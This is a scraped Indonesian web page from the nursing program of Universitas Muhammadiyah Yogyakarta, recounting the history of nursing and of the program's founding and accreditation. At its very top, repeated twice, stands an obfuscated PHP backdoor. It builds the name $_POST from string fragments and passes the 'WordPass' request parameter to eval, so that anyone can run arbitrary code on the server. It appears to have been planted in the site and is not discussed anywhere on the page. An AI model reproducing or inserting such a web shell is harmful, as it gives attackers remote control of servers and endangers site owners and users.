@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']);@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']); Sejarah | Keperawatan UMY

Sejarah

Sejarah keperawatan di dunia dimulai oleh Rufaidah yang merupakan salah seorang shahabiyah nabi Muhammad SAW. Rufaidah memiliki sifat yang harus dimiliki oleh seorang perawat profesional. Beliau empati, mampu memimpin dan mengorganisir orang lain. Selain itu Rufaidah melatih shahabiyah lainnya untuk menjadi perawat. Pada masa perang, Rufaidah memberikan perawatan kepada korban perang. Saat perang telah usai beliau memberikan perawatan kepada masyarakat sekitar yang memerlukan bantuan.

Perkembangan perawatan di Eropa diawali pada masa  Florence Nightingale (Inggris) tahun 1860-an. Sejak saat itu dunia perawatan mulai berkembang. Pada World Health Assembly ke-36 tanggal 13 Mei 1983 ditekankan tentang peran penting perawat dalam memberikan pelayanan kesehatan dan menggerakkan masyarakat untuk pengembangan Primary Health Care yang efektif. Assistant Director General of WHO (WHO, 1995) menyatakan bahwa keperawatan dituntut memenuhi tantangan perubahan profil kesehatan dunia. Tantangan yang dihadapi terutama (1) masyarakat makin menuntut pelayanan kesehatan yang berkwalitas tinggi, murah dan terjangkau; (2) respons terhadap peningkatan tuntutan pelayanan kesehatan dihadapkan pada kendala sumber kesehatan termasuk tenaga yang berkualitas; dan (3) perkembangan iptek yang pesat antara negara yang paling berkembang dan negara paling terbelakang semakin senjang.

Universitas Muhammadiyah Yogyakarta (UMY) sebagai lembaga pendidikan swasta dan bagian dari sistem pendidikan nasional mempunyai tujuan yang bertumpu pada tujuan pendidikan nasional yaitu mewujudkan sarjana muslim yang berakhlak mulia, cakap, percaya diri, berguna bagi masyarakat dan negara, telah memutuskan mendirikan Program Studi Ners. Diharapkan dengan dibukanya Program Studi Ners dapat menghasilkan  Sarjana Keperawatan (S.Kep) dan Profesi Ners yang Islami sebagai bagian dari dukungan pada pembangunan nasional, khususnya dalam penyediaan sumber daya manusia dalam bidang kesehatan yang berkualitas untuk membangun Indonesia.  Sementara belum memenuhi kriteria yang ditentukan, program ini ditubuhkan pada Fakultas Kedokteran.

Diawali dari kegiatan diskusi para perawat yang ada di lingkungan Akper ‘Aisyiyah/ Muhammadiyah, maka disepakati bahwa perlu diskusi secara berkala yang pelaksanaannya di Akper ‘Aisyiyah. Pada tahun 1997, diadakan panel forum Akper ‘Aisyiyah bersama FKIK UMY yang dihadiri oleh institusi pelayanan di lingkungan Muhammadiyah maupun ‘Aisyiyah, termasuk Akper Rumah Sakit Islam Jakarta. Selain itu hadir pula dari konsorsium ilmu kesehatan Depdikbud, Prof. Ma’rifin Husin. Tahun 2000 dengan dikeluarkannya SK Rektor No. 062/SK-UMY/IV/2000 tentang pengangkatan Pejabat Struktural PSN FKIK UMY tertanggal 11 April 2000 yang memutuskan ditubuhkannya Program Studi Ners pada FKIK UMY maka kegiatan secara resmi dipindahkan ke kampus Sonopakis. Mulai tahun ajaran 2002/2003 proses belajar mengajar dipindahkan ke kampus terpadu Jl. Lingkar Selatan, Tamantirto, Kasihan, Bantul, Yogyakarta.

Pada tahun 2004 Program Studi Ners berhasil mendapatkan Program Hibah Kompetisi A1 dari Dikti dan pada tahun  2005 Program Studi Ners telah  terakreditasi oleh BAN Dikti. Pada tahun 2009, PSN FKIK UMY berhasil mendapatkan akreditasi B. Pada tahun 2015, PSIK kembali mengajukan akreditasi untuk program sarjana dan profesi, dan berhasil mendapatkan Akreditasi A (SK BAN PT No : 851/SK/BAN-PT/Ak-SURV/PN/VIII2015)

Seiring dengan tuntutan peningkatan kualitas baik internal maupun eksternal, tahun 2013, PSIK FKIK UMY berubah nama menjadi Program Studi Ners (PSN) FKIK UMY dengan visi, misi dan tujuan baru yang sesuai dengan perkembangan keilmuan. PSN FKIK UMY merupakan kesatuan dari program akademik sarjana keperawatan dan program profesi Ners. Tahun 2012, PSN FKIK UMY mulai menerapkan sistem full blok untuk pendekatan perkuliahan Kurikulum Berbasis Kompetensi (KBK).  Pendekatan full blok diharapkan dapat meningkatkan kualitas pembelajaran dan kompetensi mahasiswa PSN FKIK UMY.